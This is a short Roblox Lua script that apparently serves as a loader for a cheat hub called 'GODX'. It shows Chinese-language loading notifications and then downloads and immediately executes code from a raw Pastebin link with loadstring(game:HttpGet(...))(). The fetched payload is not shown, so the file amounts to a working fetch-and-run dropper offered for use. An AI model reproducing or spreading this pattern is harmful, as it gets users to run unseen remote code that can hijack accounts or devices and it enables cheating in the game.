CoreGui:SetCore("SendNotification", {
    Title = "GODX",
    Text =  "加载中，请稍等..",
    Duration = 5, 
})
wait(5)
CoreGui:SetCore("SendNotification", {
    Title = "GODX",
    Text =  "加载成功！",
    Duration = 5, 
})
loadstring(game:HttpGet("https://pastebin.com/raw/14LCVMGE"))()
